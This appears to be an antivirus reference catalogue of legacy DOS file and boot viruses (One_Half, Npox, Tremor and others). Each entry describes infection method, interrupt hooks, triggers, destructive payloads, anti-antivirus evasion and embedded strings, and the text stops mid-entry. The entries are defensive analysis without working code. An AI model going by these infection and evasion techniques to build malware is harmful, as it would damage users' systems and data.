Note: The virus makes a smart move by hooking Int 1 and 3 to fool the one debugging it. [Hdenowt] Virus Type: File Virus Other Name: Virus Length: Virus Infect Type: COM and EXE files (including COMMAND.COM) Place of Origin: PC Vectors Hooked: Int 21h Infection Procedure: 1) Saves the first 16 bytes to address 114C:08D5h and later changes the first 16 bytes at 0:0 from 11BA:0285h. But before changing, an encryption occurs starting in 11BA:012Eh by XORing it to 95h, 288 bytes. 2) When the virus code is executed, it locates COMMAND.COM, then it searches for other COM and EXE files in the same directory where the virus is executed. The infection can't be easily be seen because the size of the file is still the same. Symptom: Infected files increase by approximately 1700 bytes. [Kacz] Origin: Eff Length: 4444 bytes Virus Type: Polymorphic File Virus Symptoms : EXE files increase by 4444 bytes and there is a decrease of 6144 bytes in the available memory. Infected files tend to display messages like: "Error Loading Program File", "File not Found", and "Memory Allocation Error." General Comments: On the first infection, KACZ first decrypts 4387 bytes of its code and then allocates 6144 bytes in the High Memory Area. It then transfers 4387 bytes of its code to that area. It then hooks INT 13 and INT 21. Then reads the Boot Record of the hard disk and tries to modify it. It writes the new infected Boot Record on the hard disk so every time it is used for booting up the virus will be memory resident. This virus will infect all EXE files that are opened, renamed, or executed. It will also change the file's Second field to 62. These messages are found in the decrypted virus code: "Zrobione" "Wersja" "Kodowanie" "Liczmik HD" "K a c z,o r t e s t" [V-BCIV-1] Other Name: VIENREBO Virus Type: File Virus Virus Length: Approximately 648 bytes Virus Re-infect: Does not re-infect, infected file size is consistent. If the file is already corrupted it skips and looks for another COM file. Virus Memory Type: Non Resident, Direct Infector Place of Origin: PC Vectors Hooked: Int 21h Infection Procedure: Directly infects *.COM files when an infected file is executed. Copies the virus code to the host program, adding approximately 648 bytes. Loads the virus first before running the host program. The virus first gets and sets DTA for transfer purposes. The virus then searches for *.COM files within the directory using Int 21 (4E and 4F). If the search is successful, the virus gets the file's attribute using Int 21 (43). It changes its attribute to enable the write function (especially for the COMMAND.COM). It takes note of the file time and date using Int 21 (51) so that when it accomplishes its task of altering the code, it can save the file using the original file time and date. This therefore deceives the user that the file was never been changed. Every time an infected file is executed, one COM file is infected within the same directory. Damage: 1) Increase in file size. Adds approximately 648 bytes. 2) Corrupts COMMAND.COM, making it unusable. Other COM files run normally. Symptom: Delay in program execution due to virus activity. [Nightfall.4518] Origin: Eff Length: Virus Type: File Virus General Comments: 1) Decrypts a part of its code with a size of 4526 bytes and then decrypts it again. 2) Checks if it is already loaded in the memory by checking the interrupt vectors of INT 13, INT 21 and INT 2A. 3) Allocates 5680 bytes in the High Memory Area. After loading itself resident in the High Memory Area, the virus seems to be doing nothing. It is possible that the virus has some bugs. [Dig.Death.3787] Virus Type: Polymorphic, File Virus Virus Length: 3,547 bytes Virus Infect Type: .COM and .EXE file Virus Re-infect: No Virus Memory Type: High memory resident Place of Origin: PC Vectors Hooked: INT 21h, INT 13h, INT 1Ch Infection Procedure: The virus infects both .EXE and .COM files. It infects its host file by attaching itself at the end of the file. It increases an infected file's size by 3,547 bytes. The virus can become memory resident upon loading and executing an infected file. As a polymorphic virus it first decrypts 3,422 bytes of its code. Then it allocates 5,120 bytes in the high memory starting at 9EB0:0000. From there it hooks to INT 21H by pointing its vector to its program in the high memory. It uses service 4BH of the interrupt to be able to attach itself to loading and executing files. It also uses service 4EH and 4FH to hide the actual increase in the sizes of the infected files once the virus has become memory resident; thus, the infection is unnoticeable. Once the virus has attached itself to the host file the virus encrypts its code again and writes it to a new file. No payload or trigger was seen. The virus just replicates itself to .COM and .EXE files. Symptom: Infected files increase by 3,547 bytes. [Vinchuca] Virus Type: File Virus Virus Length: Encrypted code size is 912 bytes Virus Memory Type: High Memory Place of Origin: PC Vectors Hooked: Int 21h, Int 27h Infection Procedure: 1) Loads itself to high memory, loading approximately 1328 bytes. 2) Infects *.COM files. Copies the virus code to the host program (code size is 912 bytes). Loads the virus first before running the host program. 3) While memory resident, the virus infects all COM files that are opened. The virus code is transferred to the allocated memory space using Int 21 (4A). The actual virus code is immediately executed upon meeting the requirements. The virus is TSR, using Int 27. Basically, the virus reacts by transferring its code to the high memory before actually attaching it to the code itself. Symptom: May display "Saludos para Satanic Brain y Patoruzi" "Virus Vinchaca v.1,0 1993" "Creado por Murdock." "Buenos Aires, Argentina" "Su PC tiene mal chagas....jajaja...." which appears in the virus code. Detection method: Decrypt the virus code before detection. Look for the above strings. Note: The virus code contains Int 13 (16) which tests for the disk change information. [Ginger.2774] Virus Type: File Virus Other Name: Virus Length: Place of Origin: Virus Memory Type: OS Memory Type (after rebooting=High Mem) PC Vectors Hooked: Int 21h, Int 13h Infection Procedure: The virus is an OS type, hooking Int 13 and 21h. The virus infects the boot record first, so when the machine is reset, the virus will be loaded in the high memory. From there it infects files. It allocates 4096 bytes in the memory. The problem is whenever the virus is executed and the machine is reset, after rebooting, the keyboard doesn't work due to the use of Int 15h. Because of this no infection will occur. [Mirea.1788] Alias: Origin: Eff Length: 1788 bytes Virus Type: File Virus (COM files) Symptoms : COM files will increase by 1788 bytes, and there will be a decrease of 2368 bytes in the available memory. Execution of running programs will slow down. General Comments: The MIRE1788 virus first allocates memory with a size of 2368 bytes and then transfers its virus code to the High Memory Area with a size of 1788 bytes. It will then check the date if the day is 13. And then it will hook INT 8, INT 9 and INT 21. This allows the virus to infect other .COM files. If the day of the month is 13, the virus is memory resident and the keyboard has not been pressed for 30 minutes, the virus will display a red dialog box at the center of the screen with ASCII text written on it. The only readable characters are the numbers 16 and a set of numbers 133-20-60. It also hides an infected file when a DIR at the command prompt is executed so as to hide the increase in the size of the infected file. [Little-Red] Virus Type: File Virus Virus Length: 1465 bytes Virus Infect Type: n/a Trigger Condition: Year < 1994, Date = Sept. 9, Dec. 26 Virus Re-infect: n/a Virus Memory Type: High Memory Resident Place of Origin: PC Vectors Hooked: INT 1Ch, INT 21h, INT 24h Infection Procedure: 1) Decrypts a part of its code and then executes it which turns out to be a "Get DOS Version" function. The virus uses this function because it directly controls DOS' resources. 2) Encrypts this part again. 3) Modifies the Allocated Memory and allocates 2048 bytes in the High Memory Area. It is now ready to transfer the virus code into HMA with a size of 1465 bytes. 4) In the high memory area, the virus hooks INT 1C, 21 and 24. 5) Opens the file being executed and checks if it is a .COM file; if it is, it checks if the file is already infected; if not, the virus infects it. After infection, the virus changes the attribute of "C:\COMMAND.COM" from "read-only" and "system" to "archive". [Civil_defense_FB] Virus Type: Boot, File Virus Virus Length: 6656 bytes Original Name: CIVIL DEFENSE Virus Infect Type: .COM and .EXE files Virus Re-infect: no Virus Memory Type: Non-memory resident Place of Origin: Infection Procedure: The virus primarily infects the Master Boot Sector of drive C:\. It first reads the boot sector of drive C:\ and the following sector (head 0, cylinder 0, sector 2) in its program. Then it reads 1 sector from head 0, cylinder 87, sector 65 of drive C:\. The virus sets this up by copying other data from the original boot record, and then writes this to the boot sector of drive C:\; thus, replacing the original one. Then it copies its 6,656 bytes code (13 sectors) to sector 66, cylinder 87, head 0 of drive C:\. During the analysis it was seen that it infected the virus program file CIV6672.EXE by opening it, copying its own header to the file, moving the file pointer to the end of the host file (CIV6672.EXE), and then performing INT 40H (Write to file) with the size of memory to write equals 0 (CX=0000). Thus, it just corrupts the virus program file. It was not seen how the infected boot sector loads its program from sector 66, cylinder 87, head 0 of drive C:\ which may be the reason why the infected boot sector doesn't infect the loaded and executed files. There was also no interrupt hook, memory allocation to make it resident, and trigger seen. As verified from DOS CHKDSK, there was no change in the memory allocation after loading the virus program CIV6672.EXE. Therefore, it was concluded that the virus infects the boot sector by directly running the virus program file without knowing how the virus can replicate itself in other executable files that can infect the Master Boot Sector of drive C:\ upon loading and execution of the files. Symptom: Slows down the file loading and execution time. [Plagiarist.2051] Alias: PLAGIARIST Origin: Eff Length: 2051 bytes Virus Type: Multi-partite Virus Symptoms : EXE and COM files increase by 2051 bytes and there is a decrease of 2048 bytes in the available memory. General Comments: On the first infection, the virus checks if the date is between 1993 and 2042. If this is the case, it makes a copy of the boot record at the logical end of the drive and transfers its code right after the boot record. Then it replaces the current boot record with its own infected boot record. The virus will not activate at this time. It will activate when you boot from the infected drive. The virus allocates 2048 bytes in the high memory and transfers the virus code in the disk to the High Memory Area. Afterwards it hooks INT 21, INT 28, INT 08, and INT 13. [VLamiX] Virus Type: File Virus Virus Length: Approximately 1062 bytes Virus Memory Type: High Memory Place of Origin: PC Vectors Hooked: Int 21h, Int 10h Infection Procedure: 1) Loads itself onto the high memory, allocating approximately 1,136 bytes. 2) Infects *.EXE files. Copies the virus code to the host program, adding approximately 1091-1106 bytes. Loads the virus first before running the host program. 3) While memory resident, the virus infects all opened EXE files. The virus code is decrypted. The virus reacts ordinarily by allocating space in the memory before infecting files. Nothing extraordinary happens. It just attaches its code to the host program. Symptom: May display "Smartc*.cps chklist*" "-=* Die-lamer *=-" "chklist ???" "chklist.cps" "Vlamix-1" which appears in the decrypted code. Detection method: Decrypt the virus code before detection. Look for the above strings. [Sleepwalker] Virus Type: File Virus Virus Length: At the range between 1268-1282 Virus Memory Type: High Memory Place of Origin: PC Vectors Hooked: Int 21h, Int 1Ch Infection Procedure: 1) Loads itself onto the high memory, allocating approximately 1552 bytes. 2) Infects *.COM files. Copies the virus code to the host program. Loads the virus first before running the host program. 3) While memory resident, the virus infects all opened COM files. The virus code is transferred to the allocated memory space using Int 21 (4A). The allocation space setting is determined by checking the memory from high to low using Int 21 (5801). The virus also uses the Int 1c handler to take note of the timer tick, possibly using it for some payload. Basically, the virus reacts by transferring its code to the high memory before actually attaching it to the code itself. The virus calls string "STAC," but it is uncertain if the other strings are displayed. Symptom: May display "STAC" "Sleepwalker. (c) Optus 1993." which appears in the virus code. Detection method: Check for the above string. [Alfon] Virus Name: ALFO1344 Virus Type: File Virus Virus Length: 1344-1426 bytes Virus Infect Type: .COM and .EXE files Virus Re-infect: No Virus Memory Type: Memory resident, MCB type Place of Origin: PC Vectors Hooked: INT 21h Infection Procedure: The virus infects both .COM and .EXE files. It infects .COM files by moving the host program lower and attaching the whole virus program at the beginning of the file. It's opposite with the .EXE file infection wherein the attachment of the virus program is normal or attaches its program at the end of the host program. The host program's file size increases by 1344 bytes for .EXE files while 1426 bytes for .COM files after infection. The virus first detects if a file is already infected. If it is, it leaves the file behind. If it isn't, it infects it by allocating memory after the resident part of COMMAND.COM and copying its program to that location. It then hooks INT 21H by changing its vector to its program at 17F8:01CF. Upon executing the interrupt's service 4BH, it attaches its program through the interrupt services of INT 3H which holds the original vector of INT 21H. After attaching its program to the host it returns to its memory resident program at 17F7:0000 to infect other loading and executing files. Symptom: Increase in file size by 1344 bytes (for .EXE) and 1426 bytes (for .COM). [HLLO.Beeper] Virus Type: File Virus Other Name: Virus Length: Virus Infect Type: EXE files Virus Reinfect Type: Non-Resident Place of Origin: Virus Memory Type: PC Vectors Hooked: Infection Procedure: When an infected file is executed, three EXE files will be infected, copying their filenames and changing their extensions to .COM. For every infected file, when executed, at most three EXE files get infected. This enables the virus code to execute first before the original EXE file. [One_Half.3544] Virus Status: Origin: Eff Length: 3500-5500 bytes Virus Type: Polymorphic Virus Symptoms : Increase in the size of infected COM and EXE files by 3544 bytes and decrease in available memory by 5120 bytes. Executing programs may slow down due to the infection procedure of the virus. General Comments: One-Half is a multipartite, polymorphic virus. It will first infect the boot sector of a hard disk and it will only be memory resident if the hard disk is used for booting. During bootup, it will allocate 5120 bytes of the memory and will reside in the High Memory Area. It will then hook INT 21, INT 13, and INT 1C. All COM and EXE files executed, opened or copied will be infected by the virus and will increase by 3544 bytes. The virus is also capable of hiding itself from anti-virus software. It can also hide the increase in the file size 'cause it adds special codes to check for infected files and modifies their file size when viewed. One-Half encrypts an area of the hard disk every time it starts up. This means that it slowly encrypts all the data in your hard disk. Though these areas are decrypted back when the virus is memory resident, it is advisable to create a backup copy of important files while the virus is still memory resident. This makes the virus hard to remove because it hides its encryption code encrypted in the Boot Record. The following messages are found in the decrypted virus code: "Dis is one half." "Press any key to continue" "Did you Leave the room?" [One_Half.3570] Virus Name: ONEH3570 Alias: ONE-HALF.3570 Origin: Eff Length: 3500-5500 bytes Virus Type: Polymorphic Virus Symptoms : Increase in the size of infected COM and EXE files by 3570 bytes and decrease in available memory by 5120 bytes. Executing programs may slow down due to the infection procedure of the virus. Data sometimes turn out as garbage due to the virus encryption. General Comments: One-half.3570 is a multipartite, polymorphic virus which is a variant of the One-Half.3544. It will first infect the boot sector of a hard disk and it will only be memory resident if the hard disk is used for booting. During bootup, it will allocate 5120 bytes of the memory and will reside in the High Memory Area. It will hook INT 21, INT 13, and INT 1C. All COM and EXE files executed, opened or copied will be infected by the virus and will increase by 3544 bytes. The virus is also capable of hiding itself from anti-virus software. It can also hide the increase in the file size by adding special codes to check for infected files and modifying their sizes when viewed. One-Half encrypts an area of the hard disk every time it starts up. This means that it slowly encrypts all the data in your hard disk. Though these areas are decrypted back when the virus is memory resident, it is advisable to create a backup copy of important files while the virus is still memory resident. This makes one- half hard to remove because it hides its encryption code encrypted in the Boot Record. The following messages are found in the decrypted virus code: "Dis is one half." "Press a key" "Did you leave the room?" [Unsnared] Virus Type: File Virus Virus Length: Approximately 814 bytes Virus Memory Type: High Memory Place of Origin: PC Vectors Hooked: Int 21h Infection Procedure: 1) Loads itself onto the high memory, allocating 1024 bytes (9FC0:0000). 2) Moves approximately 814 bytes (032EH) in the high memory. 3) Infects *.EXE files. Copies the virus code to the host program, adding approximately 814 (032EH) bytes. Loads the virus first before running the host program. 4) While memory resident, the virus infects all opened EXE files. The virus reacts ordinarily by allocating space in the memory before infecting files. Nothing extraordinary happens. It just attaches its code to the host program after it is loaded from the memory. Damage: 1) Decrease in memory free space. 2) Increase in file size. [Ant4096B] Virus Name: ANT4096B Virus Type: File type Virus Length: 4096 bytes Original Name: INVADER Virus Infect Type: .COM and .EXE files Virus Re-infect: No Virus Memory Type: Memory resident, MCB type Place of Origin: PC Vectors Hooked: INT 21h, INT 8h, INT 9h INT 13h Infection Procedure: The virus infects both .COM and .EXE files. It infects .COM files by moving the host program lower and attaching the whole virus program at the beginning of the file. It's opposite with the .EXE file infection wherein the attachment of the virus program is normal or attaches its program at the end of the host program. The host program's file size increases by 4096 bytes after infection. The virus program allocates 320 paragraphs (5120 bytes) in the lower part of the memory, after the resident part of COMMAND.COM, specifically at 17F8:0000. It decrypts 424 bytes of its program using XOR 46H. After decrypting it can be seen in the data area of the virus program a string saying "by Invader, Feng Chiu U., Warning: Don't run ACAD.EXE". Then it hooks INT 21H by changing its vectors to 1808:05DF, INT 08H to 1808:01F9, INT 09H to 1808:02B8, and INT 13H to 1808:0435. No payload was seen in the interrupt hooks. The virus only infects the loaded and executed files. Symptom: Infected files increase by 4096 bytes. [Ontario-B] Alias: Origin: Eff Length: 1024 bytes Virus Type: Symptoms : Increase in size of COM and EXE programs by 1024 bytes and decrease in free memory by 2048 bytes. General Comments: On the first infection, this virus will first allocate 2048 bytes in the High Memory Area and then will transfer 1024 bytes of its code to that area. It will then hook INT 21 with infection procedure to services 4B00(Execute Program), 3D02(Open File Handle), 11 and 12 (Find Directory Entries). This virus will infect all EXE and COM files that are opened, renamed, or executed. It will also hide infected files when viewed or listed using the DIR command. There seems to be no damage done by the virus other than replicate. [Nov_17] Alias: November-17th.800 Origin: Eff Length: 800 Virus Type: File Virus Symptoms : Will increase .COM and .EXE files by 800 bytes and will allocate 832 bytes in the High Memory Area. General Comments: On the first infection, this virus checks if the file carrier is .EXE. It will infect .COM and .EXE differently because of the difference in the structure of the two. It then allocates 832 bytes in the High Memory Area and then moves its virus code to HMA. Then it hooks INT 21, with points to services 3D (Open File Handle), 43 (Get/Set File Attributes) and 4B00 (Execute Child Process). After this, the virus returns control to the original routine. This virus will change the attributes of files opened or executed, in addition to infecting them, once the virus is memory resident. Upon loading, NO-17-800 will check if the system date is between November 17 and November 30; if it is, the virus will save the system time's hour of day and will always check it until it has changed; this is when it will write 8 sectors starting at the 1st sector of the default drive. This will destroy the Boot Record and files located in the first 8 sectors of floppy disks while it will destroy the Boot Record and the File Allocation Tables of the hard disk depending on the default drive of the system. This string is found in the virus code: "SCAN.CLEAN.COMEXE" [Nov_17th.855.A] Alias: NOVEMBER 17-855 Origin: Eff Length: 855 Virus Type: File Virus Symptoms : Will increase .COM and .EXE files by 855 bytes and will allocate 896 bytes in the High Memory Area. General Comments: On the first infection, this virus checks if the file carrier is .EXE. It will infect .COM and .EXE differently because of the difference in the structure of the two. Then it allocates 896 bytes in the High Memory Area and then moves its virus code to HMA. It then hooks INT 9 and INT 21, with points to services 3D (Open File Handle), 43 (Get/Set File Attributes) and 4B00 (Execute Child Process). After this it returns control to the original routine. This virus will change the attributes of files opened or executed, in addition to infecting them, once the virus is memory resident. This is a variant of the NO17-800 virus but the difference is that this virus is triggered by the keys pressed and not by time as that of NO17-800 virus. When a certain number of keys are pressed and if the system date is between November 17-30, this is when it will write 8 sectors starting at the 1st sector of the default drive. This will destroy the Boot Record and files located in the first 8 sectors of floppy disks while it will destroy the Boot Record and the File Allocation Tables of the hard disk depending on the default drive of the system. This string is found in the virus code: "SCAN.CLEAN.COMEXE" [No_Frills.Dudley] Virus Status: Origin: Eff Length: 1215 Virus Type: File Virus; Encryption Virus Symptoms : Will increase .COM and .EXE files by 1215 bytes and will allocate 4624 bytes in the High Memory Area. General Comments: On the first time it is loaded, NOFDUDLY will first decrypt 1153 bytes of its code. Then it will check if it is already loaded in the memory. If it is not yet loaded then it will allocate 4624 bytes in the High Memory Area. Then it will transfer all of its 1215 bytes code to the High Memory Area. It will then hook INT 21, adding extra codes to services 54 (Get Verify Flag), 4B00 (Execute Program), 3D (Open File Handle), 56 (Rename File), and 6C (Extended Open/Create). Then it will return control to the original routine. When in memory, NOFDUDLY will temporarily hook INT 24 (Critical Error Handler) so that it can readily troubleshoot problems if errors occurred and then unhook it again. Then it will infect the command interpreter (COMMAND.COM) of the default drive. This virus is an enhanced variant of the NOFRILLS virus with an additional encryption enhancement to the older variant. Text message found in the virus code: "[Oi Dudley] [PuKE]" [No_Frills.843] Alias: NO FRILLS Origin: Eff Length: 843 Virus Type: File Virus Symptoms : Will increase .COM and .EXE files by 843 bytes and will allocate 1536 bytes in the High Memory Area. General Comments: This virus will first check if the carrier file is .COM or .EXE. It will do so to know which code will be transferred to the High Memory Area. It will then allocate 1536 bytes of High Memory Area and transfer 400h of its virus code to it. It will then hook INT 21 adding extra codes to services 54 (Get Verify Flag), 4B00 (Execute Program), 3D (Open File Handle), 43 (Get/Set File Attributes), and 6C (Extended Open/Create). Then it will return control to the original routine. When in memory, NOFRILLS will temporarily hook INT 24 (Critical Error Handler) so that it can readily troubleshoot problems if errors occurred and then unhook it again. Then it will infect the command interpreter (COMMAND.COM) of the default drive. This message is found in the virus code: "+-No Frills 2.0 by Harry McBungus-+" [Nomenklatura] Virus Status: Origin: Eff Length: 1024 bytes Virus Type: Symptoms : Increase of 1024 bytes in sizes of EXE and COM files and decrease of 1072 in the available memory. Usually displays disk read/write errors like "Sector not found", "Invalid Media Type" and other disk related errors. General Comments: The NOMENKLATURA virus is almost similar to common viruses to date. The difference is that it uses INT 2F service 13 (Set Disk Interrupt Handler) which is more like an error-trapping procedure for the virus when infection of other files is impossible. It is common to other viruses because it will first allocate in the High Memory Area with a size of 1072 bytes and then transfer 1055 bytes of it to the high memory. The extra bytes loaded by the virus are the addresses of specific locations in the Operating System in the memory so it can directly access it and also the interrupt vectors of INT 21 and INT 13. It also has checking procedures if an executed file is infected or not, if it is COM or EXE. Executable files that are opened and/or executed will be infected immediately by this virus. This virus was named as such because of the text string found in the virus code : "NOMENKLATURA" [Cordobes.3334] Virus Type: Polymorphic, File Virus Virus Length: 3,333 bytes Virus Infect Type: .EXE files Virus Re-infect: no Virus Memory Type: Memory resident, MCB type Place of Origin: PC Vectors Hooked: INT 21h Infection Procedure: The virus only infects .EXE files. The virus infects the host file by attaching itself at the end of the file. As a polymorphic virus, it first decrypts its code. The virus has a complicated way of decrypting its code. The virus allocates 4,128 bytes in the low memory starting at 1806:0000 and copies its 3,333 bytes program there to stay resident. From there it hooks INT 21H by pointing its vector to its program in the low memory at 1816:0BAB. It uses this interrupt to attach itself to the loading and executing .EXE files. Once activated by loading and executing infected files the virus checks for the current month and day. If it is August 10 the virus infects files. Aside from infecting .EXE files, it will also search for AUTOEXEC.BAT in drive C:\ and append the following: @Echo Virus "EL MOSTRO CORDOBES" @Echo No tema por sus datos. Que pase un buen @Echo. @Pause Thus, upon system bootup in drive C:\ the text string above will be displayed and will pause until a key is pressed. The same string can be seen inside the viral code. Sometimes the virus cannot attach to .EXE files completely so the increase in the size of the host file after infection is indefinite, and cannot become memory resident. The corrupted files will not finish loading and will display "Error in EXE file." Damage: Corrupts .EXE files. Symptom: Will add the above text to the AUTOEXEC.BAT file in drive C:\. [Jos] Virus Type: File Virus Virus Length: Virus Infect Type: MBR Place of Origin: Virus Memory Type: PC Vectors Hooked: Infection Procedure: 1) Moves 21CDh in DS:[FE], 14EBh in DS:[100] and 17h in DS:[11E]. 2) Loads/executes a program having the control block = 114C:11E and ASCIIZ command line = 114C:0. This procedure is unsuccessful. 3) Writes character in teletype mode having 1Eh as the graphics mode, page 1. Displaying : "Beware the Jabberwock, my son!" "The jaws that bite, the claw that catch!" "And hast thou slain the Jabberwock!" "Come to my arms, my beamish boy!" 4) Loops with FFFFh as the value of CX (just a delay). 5) Executes these codes: MOV GS,DX CLI CLD IN AL,64 TEST AL,04 JNZ D840 D840: SMSW AX TEST AL,01 JZ D84F CLI MOV AL,FE OUT 64,AL After performing these codes the machine performs a warm boot. Symptom: A message can be seen in address = 114C:0239h "JABBERW OCKY (.) the first Romanian Political Virussian Dhohoho$ Released Date 12-22-1990" [Npox.963.A] Alias: EVIL GENIUS 2.0 Origin: Eff Length: 963 bytes Virus Type: Symptoms : Increase of 963 bytes in sizes of EXE and COM files and decrease of 1024 in the available memory. When in a write-protected floppy, it usually displays a "Write Protect Error" message when you try to read from it. General Comments: On the first infection, this virus allocates 1024 bytes in the High Memory Area and then transfers its code to the HMA. After that, it hooks INT 21 and INT 9 and then returns control back to the original routine. This text string can be found in the virus code: "Evil Genius V2.0 - RS/NuKE" "C:\COMMAND.COM" It will infect COM and EXE files that are loaded, executed or opened by other files. During infection, the file's time and date will not be modified except for the seconds count which will be set to :58. This is also the virus' signature if a file is already infected. But before infecting files, it checks whether the file is executed by another program (i.e., debuggers, anti-virus). If it is being executed by another file then it will check if the file loader has the following: 1.) ****prot.*** (i.e. f-prot, nprot, lprot) 2.) ****scan.*** (i.e. pcscan, scan, viruscan) 3.) ****lean.*** (i.e. clean) If the above characteristics are not satisfied then it will infect the executed program. Once resident, the N-Pox virus will hide the increase in the size of infected programs when the user tries to view it (i.e., DIR). It will also modify loaded infected files in the memory so as to hide them from anti-virus software. The damage that N-Pox does is that if the system date is the 24th of any month and if a key is pressed, it will format the first 32 tracks of the hard disk, starting from track 0. This will damage the Boot Record, File Allocation Tables (FAT) and the system files on the hard disk. [Cpw.1527] Virus Type: Polymorphic, File Virus Virus Length: 1,527 bytes Virus Infect Type: .EXE and .COM file Virus Re-infect: No Discovery Date: 1992 Virus Memory Type: High memory resident Place of Origin: Chile PC Vectors Hooked: INT 21h Infection Procedure: The virus infects both .EXE and .COM files. It infects its host file by attaching itself at the end of the file. It increases an infected file's size by 1,527 bytes. The virus can become memory resident upon loading and executing an infected file. As a polymorphic virus it first decrypts its code. Then it allocates 1,984 bytes in the high memory starting at 9F84:0000. It hooks INT 21H by pointing its vector to its program in the high memory at 9F84:0258 to be able to attach itself to loading .EXE and .COM files upon opening it. Before infecting a loading executable file, it first deletes CHKLIST.CPS, which is an anti-virus file, if it exists. Then it infects COMMAND.COM in drive C:\ by attaching itself to the file. After infecting C:\COMMAND.COM, it finally infects the loading executable file. During infection, the virus checks for the current month, day, and hour. If the current date is September 11 or December 28 then it checks for the current hour. The following hour of the day will trigger the payload: 0th hour.......(12:00 am) 1st hour.......(1:00 am) 4th hour.......(4:00 am) 6th hour.......(6:00 am) 7th hour.......(7:00 am) 10th hour.......(10:00 am) 11th hour.......(11:00 am) 13th hour.......(1:00 pm) 16th hour.......(4:00 pm) 18th hour.......(6:00 pm) 19th hour.......(7:00 pm) 21st hour.......(9:00 pm) The payload deletes the first file entry in the current directory until it deletes the currently loaded file. Even though the currently loaded file that activated the virus was deleted, the virus still remains memory resident, and will continue its payload. The deletion occurs every time an executable file is loaded, given that the virus is already memory resident. Not all .COM files are infected by the virus. Only those that have large file sizes will be infected. As checked from DOS CHKDSK the virus occupies 1,792 bytes in the memory or decreases the available memory by that size. The following text strings can be seen within the virus code: "CPW fue becho en Chile en 1992," "VIVA CHILE MIERDA!" [DR&ET] Virus Type: Polymorphic, File Virus Virus Length: 1,710-1,713 bytes Virus Infect Type: .COM and .EXE files Virus Re-infect: No Virus Memory Type: High memory resident Place of Origin: PC Vectors Hooked: INT 21h Infection Procedure: The virus infects .COM and .EXE files. It increases an infected file's size by 1,710 bytes for .COM file and 1,713 bytes for .EXE file. The virus infects the host file by attaching itself at the end of the file. The virus can become memory resident upon loading and executing an infected file. When memory resident the virus can infect executable files when it is opened. The virus uses complex method of decryption. After decryption the virus allocates 1,776 bytes in the high memory and copies its program there to stay resident. Then it hooks INT 21H by changing its vector to point to its program in the high memory at 9F92:017A. It uses this interrupt to attach itself to the host file. Before attaching to the host file, the virus encrypts its code again and then writes itself to the host file. During infection, the virus checks for the current day. If it is the 13th day of the month it checks for another condition by decrypting and comparing data from its data area whose condition is possibly known only to the author of the virus. If the 2 conditions are satisfied it will execute the payload of overwriting the Master Boot Sector of drive C:\ with its own program and replacing the original Interrupt Vector Table with its own table. As a result the system will hang up during bootup. The date and time attributes of the host file after infection are not changed. Damage: Corrupts the Master Boot Sector and Interrupt Vector Table. Symptom: 1) Hangs the system during bootup. 2) Increases the file size by 1,710 for .COM files and 1,713 for .EXE files. [Trakia.1070] Virus Type: File Virus Virus Length: Approximately 1076-1084 bytes Virus Infect Type: Mutation Virus Virus Memory Type: High Memory Place of Origin: PC Vectors Hooked: Int 21h Infection Procedure: 1) Loads itself onto the high memory, allocating 1360 bytes (9FAB:0000). 2) Moves 1357 (054DH) bytes to the high memory. 3) Infects *.COM and *.EXE files. Copies the virus code to the host program, adding approximately 1076 - 1084 bytes. Loads the virus first before running the host program. This virus is a mutation virus. When an infected file is executed, it will search for *.COM and *.EXE files using Int 21 (4E and 4F), and will infect when DTA is set. It only infects files within the current directory. Damage: 1) Free memory decreases. 2) Increase in file size. Adds approximately 1076-1084 bytes. Symptom: Delay in program execution due to file search. Text string: "Files Only (No symbols) .SYM - Load symbol file only. No extension - Load program & symbols" appears within the virus code. [Predator.2448] Virus Status: Origin: Eff Length: 2448 bytes Virus Type: Polymorphic Virus Symptoms : Increase of 2448 bytes in sizes of EXE and COM files and decrease of 6144 bytes in the available memory. General Comments: This virus is a variant of the PREDATOR-1072 virus. It will infect all EXE and COM files that are executed, opened or copied. It is also memory resident which resides in the High Memory Area. During the first infection, it decrypts 2424 bytes of its code and then allocates 6144 bytes in the High Memory Area and transfers its code there. It also hooks INT 13 and 21. This message is found in the encrypted virus code: "Predator Virus #2 (c) 1993 Priest - Phalcon/Skism" [Freddy.2.1] Virus Type: File Virus Other Name: Virus Length: Place of Origin: PC Vectors Hooked: Int 21h Infection Procedure: 1) Encrypts data to 11D2:0059h to 937h reading: "COMMAND.COM *.COM *.EXE Freddy KRueGer 2.1 Hi Fridrik!", thus copying data from 11D2:0059 to 114D:0 to 13FFh, hooking interrupt 21. 2) Infects COMMAND.COM, COM and EXE files. When the virus is loaded it hangs because it searches for the host to infect it. Infecting the host, it destroys the file. [Tremor-1] Virus Type: File Virus Virus Length: Virus Memory Type: High Memory Place of Origin: Trigger Condition: Checks if the date is above April 13, or if the year is above or equal to 1993. If so it executes the virus code directly. PC Vectors Hooked: Int 21h, Int 15h, Int 2Fh Infection Procedure: 1) Loads itself onto the high memory, allocating approximately 4272-4288 bytes. 2) Infects *.EXE files. Copies the virus code to the host program, adding approximately 4003 bytes. Loads the virus first before running the host program. 3) While memory resident, the virus infects all opened EXE files. The virus checks for the system date and time, after the virus code is decrypted. The code then checks for the DOS version with reason unknown. It continues by getting the process ID of the program, to enable itself to set the kind of allocation strategy it wants to do, Int 21 (58). After this, the virus checks for the extended memory, Int 21 (43). If all needed requirements are set, it begins to modify the memory allocation, Int 21 (4A). The virus code is then transferred to the high memory, at a size approximately 4003 bytes. When in memory, the virus sets the DTA to which it will copy its code. Symptom: Displays: "-=> T.R.E.M.O.R was done by NEUROBASHER /May-June '92, Germany <=- -MOMENT-OF-TERROR-IS-THE-BEGINNING-OF-LIFE-" Infected files run normally. Increase in file size, and occupies memory space. Detection method: Decrypt the virus code before detection. [Troj.1463] Virus Type: Virus Length: Approximately 1463 bytes Virus Memory Type: High Memory Place of Origin: PC Vectors Hooked: Int 21h Infection Procedure: 1) Loads itself onto the high memory after decryption, allocating 3536 bytes (9F23:0100). 2) Moves 1463 (05B7H) bytes to the high memory. Does not actually infect files, what it does is load itself resident in the high memory and mess up the execution of files. (see Damage below) Damage: When an infected file is executed while the virus is memory resident, two payloads can be detected. 1. COM files: When *.COM files are executed while the virus is memory resident, those files will not run. 2. EXE files: When *.EXE files are executed while the virus is memory resident, those files will not run, like COM files. But this will only happen once. The second execution of an EXE file will result to a same display, but this time the COMMAND.COM becomes invalid. System becomes useless afterwards. Note: Executing a COM file will not suspend itself. But when an EXE file is executed after a COM file has been executed, the system will then suspend. Symptom: Text string: "Trojector II, (c) Armagedon Utilities, Athens 1992" appears within the decrypted code. [Troj.1561] Virus Type: Virus Length: Approximately 1561 bytes Virus Memory Type: High Memory Place of Origin: PC Vectors Hooked: Int 21h Infection Procedure: 1) 